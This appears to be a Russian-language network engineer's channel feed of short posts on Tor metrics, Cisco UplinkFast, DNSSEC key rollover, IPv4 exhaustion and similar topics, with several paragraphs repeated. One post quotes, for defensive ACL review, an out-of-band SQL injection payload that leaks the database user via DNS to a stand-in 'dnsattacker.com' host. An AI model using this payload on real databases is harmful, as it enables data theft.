В блоге APNIC статья про сервис отображающий карту "инфицированных" IP. Сам сервис https://ip.team-cymru.org (почему-то браузер ругается на сертификат, видимо слишком с безопасностью перемудрили) и он не единственный.
Из интересного - есть списки запрещённых префиксов для глобальной маршрутизации/использования (bogons) даже для IPv6 есть. Для информационных списков помимо веба есть ещё доступ по другим протоколам, как вариант DNS - больше возможностей автоматизации. Не самый уникальный ресурс, но интересный чтобы посмотреть.
Из интересного - есть списки запрещённых префиксов для глобальной маршрутизации/использования (bogons) даже для IPv6 есть. Для информационных списков помимо веба есть ещё доступ по другим протоколам, как вариант DNS - больше возможностей автоматизации. Не самый уникальный ресурс, но интересный чтобы посмотреть.
APNIC Blog
Has your IP been misbehaving? Here's a free checkup | APNIC Blog
Guest Post: A new community service tool allows Internet users to see if their IP address has been seen to be misbehaving or in use by an infected host.
TOR Project всё время как-то мимо меня проходит. Оказывается у них есть достаточно подробный сайт с глобальной статистикой и поиском https://metrics.torproject.org. Откуда, например, я узнал что внутри нашей AS есть как минимум одна TOR relay нода, так как есть поиск по ASn помимо прочего.
Или что мы третьи в мире по количеству пользователей TOR, на первом США, за нами Германия и Франция. А ещё живая карта прямо крутая.
Почему-то я считал что TOR менее публичный сервис, но нет, для любопытных глаз есть довольно много статистики и её интересно смотреть.
Или что мы третьи в мире по количеству пользователей TOR, на первом США, за нами Германия и Франция. А ещё живая карта прямо крутая.
Почему-то я считал что TOR менее публичный сервис, но нет, для любопытных глаз есть довольно много статистики и её интересно смотреть.
torflow.uncharted.software
Data flow in the Tor network
Просто погода:
То же веб, настоящий. Куда вся мощь современных фреймворков с адаптивным дизайном и резиновым интерфейсом ещё не добралась, и наверное это позитивный момент.
На GitHub проекта намного больше описания и параметров, достаточно полезных.
P.S. Наиболее повседневная вещь для инструмента "веб из консоли" в моей практике это curl ifconfig.io - выдаст используемый IP. Если у вас IPv6 то надо не забыть специфицировать
curl wttr.in или в конкретном месте curl wttr.in/Berezniki, от создателя cheat.sh.То же веб, настоящий. Куда вся мощь современных фреймворков с адаптивным дизайном и резиновым интерфейсом ещё не добралась, и наверное это позитивный момент.
На GitHub проекта намного больше описания и параметров, достаточно полезных.
P.S. Наиболее повседневная вещь для инструмента "веб из консоли" в моей практике это curl ifconfig.io - выдаст используемый IP. Если у вас IPv6 то надо не забыть специфицировать
curl -4, чтобы IPv4 получить тоже. На сайте чуть больше примеров, но всё они уже вокруг HTTP.Twitter
Command Line Magic
curl https://t.co/StWy8oU1N0 # If he had just run this, he would have known it was getting ready to rain.
В 1997 году 1 Сентября был представлен
nmap - статья с исходным кодом и описанием в Phrack Magazine. День знаний, символично.phrack.org
.:: Phrack Magazine ::.
Phrack staff website.
Оцените костыль от Cisco. Когда срабатывает
Такое усложнение происходит почти всегда когда добавляется функционал сверху, чтобы улучшить текущее поведение (не архитектуру) и когда в архитектуре не заложено достаточно гибкости. Кстати поэтому многие протоколы так любят TLV формат.
Правильным путём пошли чуть позже в RSTP, реализовав переключение на
Uplinkfast в STP, CAM коммутаторов по прежнему помнит предыдущее состояние. Чтобы не ждать пока STP сойдётся стандартным способом, коммутатор который обрабатывает новое состояние начинает флудить в новый root порт кадрами в которых SRC MAC адреса из его CAM таблицы, а DST MAC - dummy multicast 0100.0ccd.cdcd. Итог, адреса переизучаются на новые порты и трафик начинает бежать быстрее чем STP обрабатает событие смены топологии.Такое усложнение происходит почти всегда когда добавляется функционал сверху, чтобы улучшить текущее поведение (не архитектуру) и когда в архитектуре не заложено достаточно гибкости. Кстати поэтому многие протоколы так любят TLV формат.
Правильным путём пошли чуть позже в RSTP, реализовав переключение на
Alternate port вместе с уведомлением об изменении топологии. Uplinkfast ушёл в прошлое, наверное. (X)STP во всех его вариантах ещё нет, а может и вообще нет, но хотя бы по умолчанию включен обычно RSTP, что не так плохо.Cisco
Understanding and Configuring the Cisco UplinkFast Feature
UplinkFast is a Cisco specific feature that improves the convergence time of the Spanning-Tree Protocol (STP) in the event of the failure of an uplink. The UplinkFast feature is supported on Cisco Catalyst 4500/4000, 5500/5000, and 6500/6000 series switches…
Оптимистичная статья-рассуждения Daniel Dib о перспективах сетевика в виртуальном мире облаков. Если вы настраиваете не только виланы на определённой модели коммутаторов то скорее всего никуда не денетесь, даже если всё уйдёт в облака. Остануться всемирные сети - WAN, тот самый Интернет, WiFi, TCP/IP.
Но с другой стороны что если не всё уйдёт в облако, а всё само станет облаком, гигантский всемирный компьютер, вместо ИнтерНет - ИнтерЭВМ. Протоколы превратятся в API межпроцессного взаимодействия и полностью уйдут программистам. То что останется внутри будет на совести вендоров, как это сейчас произошло с суперскалярной архитектурой процессоров, где даже ассемблер всего лишь небольшое подмножество доступных методов из всего набора скрытых внутри чипа. Техническое развитие движется по пути упрощения и доступности потребителю. Конечная точка - включил и всё работает сразу, даже на уровне магистралей, даже на самом низком и профессиональном уровне.
Сети становятся умнее, языки программирования становятся умнее, большая часть работы уходит к компилятору или автогенератору настроек. Тем кто их пишет (а много ли таких людей?) беспокоится конечно не стоит. Многослойная и даже супермногослойная архитектура в итоге приводит к тому что нижний слой не требует обслуживания, даже если он и сбоит то верхние слои уже давно с этим смирились и решают проблему сами. Давно ли вы измеряли сопротивление терминатора на коаксиале, а напряжение на витой паре? А зачем?
Не упускайте момент, возможно уже и не стоит учить как настраивать вилан, скоро он сам будет настроен так как надо уже на заводе.
Но с другой стороны что если не всё уйдёт в облако, а всё само станет облаком, гигантский всемирный компьютер, вместо ИнтерНет - ИнтерЭВМ. Протоколы превратятся в API межпроцессного взаимодействия и полностью уйдут программистам. То что останется внутри будет на совести вендоров, как это сейчас произошло с суперскалярной архитектурой процессоров, где даже ассемблер всего лишь небольшое подмножество доступных методов из всего набора скрытых внутри чипа. Техническое развитие движется по пути упрощения и доступности потребителю. Конечная точка - включил и всё работает сразу, даже на уровне магистралей, даже на самом низком и профессиональном уровне.
Сети становятся умнее, языки программирования становятся умнее, большая часть работы уходит к компилятору или автогенератору настроек. Тем кто их пишет (а много ли таких людей?) беспокоится конечно не стоит. Многослойная и даже супермногослойная архитектура в итоге приводит к тому что нижний слой не требует обслуживания, даже если он и сбоит то верхние слои уже давно с этим смирились и решают проблему сами. Давно ли вы измеряли сопротивление терминатора на коаксиале, а напряжение на витой паре? А зачем?
Не упускайте момент, возможно уже и не стоит учить как настраивать вилан, скоро он сам будет настроен так как надо уже на заводе.
Daniels Networking Blog
Networking in the Cloud - Different but the Same - Daniels Networking Blog
Networking in the cloud is impressive. Building redundant internet access is as easy as attaching an internet gateway (IGW) to your VPC. In an on-premises network we would have to build VLANs, subnets, IGPs, possibly HSRP and BGP etc. This
Интересный акцент именно на свободном ПО - в Росреестре сломался Ceph (вроде бы). То что всё может сломаться не новость, даже обыденность, но со свободным ПО есть особенность - часто позвонить некому, чтобы претензию предьявить. В пресс-релизе ничего про причины нет, так что всё на уровне слухов, как TAdviser и написал.
ssh-auditor, чтобы убедиться что какой-то из пользователей не забыл поставить на вход правильный пароль.
GitHub
GitHub - ncsa/ssh-auditor: The best way to scan for weak ssh passwords on your network
The best way to scan for weak ssh passwords on your network - ncsa/ssh-auditor
Десяток способов как легко передать данные c заражённой машины используя обычные протоколы: DNS, HTTP, ICMP. Это всё как правило разрешено, а без DPI и анализа совершенно не будет понятно что внутри передаются какие-то чувствительные данные.
В этом нет ничего необычного или сложного - прицепил к запросу DNS кодированную строку и всё, надо лишь правильно интерпретировать с другой стороны. Но признаться я не задумывался что такие же конструкции работают внутри SQL запросов:
Появился повод пересмотреть ACL и список действительно необходимого для работы серверов.
В этом нет ничего необычного или сложного - прицепил к запросу DNS кодированную строку и всё, надо лишь правильно интерпретировать с другой стороны. Но признаться я не задумывался что такие же конструкции работают внутри SQL запросов:
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.oob.dnsattacker.com\\test.txt'));
Появился повод пересмотреть ACL и список действительно необходимого для работы серверов.
NotSoSecure
Out of Band Exploitation (OOB) CheatSheet
Introduction: Out-Of-Band (OOB) technique provides an attacker with an alternative way to confirm and exploit a vulnerability which is otherwise “blind”. In a blind vulnerability, as an attacker you
Forwarded from Sys-Admin InfoSec (Yevgeniy Goncharov)
Яндекс запустил свое облако, с их слов стоимость виртуальной машины начинается от 220 рублей в месяц, а при первой регистрации на счёт падает 4к рублей... Надо бы попробовать между делом...
P.S. У mail ru кстати говоря есть аналогичный сервис, но их цены меня как-то не порадовали..
https://cloud.yandex.ru
P.S. У mail ru кстати говоря есть аналогичный сервис, но их цены меня как-то не порадовали..
https://cloud.yandex.ru
yandex.cloud
Yandex Cloud — надёжное облако для вашего бизнеса
В Yandex Cloud каждый может создавать и совершенствовать свои цифровые сервисы, используя инфраструктуру и уникальные технологии. Три зоны доступности, минимум зависимостей и соответствие стандартам ISO, PCI DSS, GDPR и 152-ФЗ РФ.
IANA всё ещё доскребает по сусекам. RIPE тоже получил свои крохи, хватит на одного нового LIR по текущей политике распределения.
RIPE Network Coordination Centre
RIPE NCC Receives /22 from IANA's Recovered Pool
On 4 September 2018, the RIPE NCC and the other Regional Internet Registries (RIRs) were each allocated the equivalent of a /22 of IPv4 address space from the Internet Assigned Numbers Authority (IANA).
Книга про DNS. Не только про конкретные DNS, альтернативные в данном случае не BIND. А про то что делать и как работать с DNS в целом, на примере конкретно взятых DNS серверов.
jpmens.net
Alternative DNS Servers: the book as PDF
I recently announced that we would be making my book Alternative DNS
Servers available free of charge, so without further ado, here it is.
(Table of Contents / Reviews)
The PDF (11 MB) is comple...
Servers available free of charge, so without further ado, here it is.
(Table of Contents / Reviews)
The PDF (11 MB) is comple...
И всё-таки это красиво. Девиация профессиональная конечно, но красиво.
Twitter
Fred Cuiller
Back to the lab. Validating ASR 9000 24*10G-1G powerglide linecards based on Tomahawk network processor (3rd gen)
В этом году ICANN всё же более отвественно подошла к процессу KSK rollover. Была выполнена выборка на предмет обращений к DNSSEC со старым ключём. Операторы IP которых были в этом замечены получили соответстующее письмо на адреса указанные в IRR. Хорошие операторы наверное не получили :) а плохие, как мы, получили.
Вся выборка содержит 21918 ASn, 162614 IPv6 адресов и 1188586 IPv4. Для нашей сети туда попали только абонентские устройства (для многих других сетей скорее всего тоже), но вообще это достаточно чувствительные данные на мой взгляд - одним списком потенциальные DNS серверы во всём мире.
Для спокойствия можно выполнить проверку и посмореть использует ли провайдер DNSSEC впринципе, т.е. стоит ли беспокоиться о возможных проблемах:
Пользователям Yandex не стоит, а пользователям Google можно надеяться что админы всё сделали правильно и после 11 октября ничего не сломается.
Вся выборка содержит 21918 ASn, 162614 IPv6 адресов и 1188586 IPv4. Для нашей сети туда попали только абонентские устройства (для многих других сетей скорее всего тоже), но вообще это достаточно чувствительные данные на мой взгляд - одним списком потенциальные DNS серверы во всём мире.
Для спокойствия можно выполнить проверку и посмореть использует ли провайдер DNSSEC впринципе, т.е. стоит ли беспокоиться о возможных проблемах:
dig @dns.yandex.ru dnssec-failed.org a +dnssec | grep HEADER
;; -HEADER- opcode: QUERY, status: NOERROR, id: 47838
dig @8.8.8.8 dnssec-failed.org a +dnssec | grep HEADER
;; -HEADER- opcode: QUERY, status: SERVFAIL, id: 3549
Пользователям Yandex не стоит, а пользователям Google можно надеяться что админы всё сделали правильно и после 11 октября ничего не сломается.
Чем посмотреть структуру диска в Linux. Не часто такое приходится делать, современные файловые системы одеяло на себе перетащили да и LVM никто не отменял. Но во время старта новой системы без базового понимания разделов диска никуда.
Network World
Examining partitions on Linux systems
Linux systems provide many ways to look at disk partitions. Here's a look at commands you can use to display useful information -- each providing a different format and with a different focus.
VPN с правильной подачей, да ещё под крылом RIPE NCC с прицелом именно для Интернет провайдеров.
Так-то для провайдеров в России VPN не что-то новое или сложное в установке. Есть много провайдеров которые используют VPN технологии как способ аутентификации пользователя внутри своей сети. И видимо, такой способ как раз ввиду простоты настройки появился или в силу L3 дизайна, где с PPPoE сложно развернуться.
А вот чтобы VPN был с другой стороны, т.е. обеспечить своим пользователям безопасный (приватный) канал в публичных сетях я что-то не видел. Даже те кто имеет свою сеть Wi-Fi хотспотов не утруждают себя этим. Даже шифрованием не утруждают - проверяют только права доступа и иногда для своих клиентов скорость выше делают чем гостям.
Хороший посыл, уже есть предварительные версии приложения для популярных ОС, есть действительно простая инструкция по установке, есть GitHub если хочется погрузиться в детали реализации. Внутри OpenVPN и обещают WireGuard.
Ждём пока провайдеры позаботятся о своих абонентах не только в своих сетях, VPN он же не для аутентификации и не для того чтобы блокировочки обходить.
Так-то для провайдеров в России VPN не что-то новое или сложное в установке. Есть много провайдеров которые используют VPN технологии как способ аутентификации пользователя внутри своей сети. И видимо, такой способ как раз ввиду простоты настройки появился или в силу L3 дизайна, где с PPPoE сложно развернуться.
А вот чтобы VPN был с другой стороны, т.е. обеспечить своим пользователям безопасный (приватный) канал в публичных сетях я что-то не видел. Даже те кто имеет свою сеть Wi-Fi хотспотов не утруждают себя этим. Даже шифрованием не утруждают - проверяют только права доступа и иногда для своих клиентов скорость выше делают чем гостям.
Хороший посыл, уже есть предварительные версии приложения для популярных ОС, есть действительно простая инструкция по установке, есть GitHub если хочется погрузиться в детали реализации. Внутри OpenVPN и обещают WireGuard.
Ждём пока провайдеры позаботятся о своих абонентах не только в своих сетях, VPN он же не для аутентификации и не для того чтобы блокировочки обходить.
RIPE Labs
Let's Connect! Easy to Install and Secure VPN Software that Respects your Privacy
Going online on unknown Internet hotspots - whether at a restaurant, an airport or in a restaurant - isn't actually very safe or secure for users. This is due to the open character of hotspots which makes it easy to impersonate legitimate hotspots and eavesdrop…
Двоичный счётчик, фактически сумматор, на 6 разрядов - механический!
Twitter
Universal-Sci
Mechanical binary counter. (By Mathmo14159) https://t.co/ILavQyivxs
Если хочется... точнее не хочется покидать родную Cisco консоль. Используем
Но сами по себе парольные линки для протоколов это очень правильно, даже если быть на 200% уверенным. Даже если всё только внутри сети, не говоря уже про BGP пиринг. Хотя это и сильно не частое явление надо себе перебарывать и включать, и партнёров настойчиво просить делать то же.
TCL чтобы сделать файл и verify /md5 чтобы посчитать его хэш. Получилось небезопасно и долго, но зато весело.Но сами по себе парольные линки для протоколов это очень правильно, даже если быть на 200% уверенным. Даже если всё только внутри сети, не говоря уже про BGP пиринг. Хотя это и сильно не частое явление надо себе перебарывать и включать, и партнёров настойчиво просить делать то же.
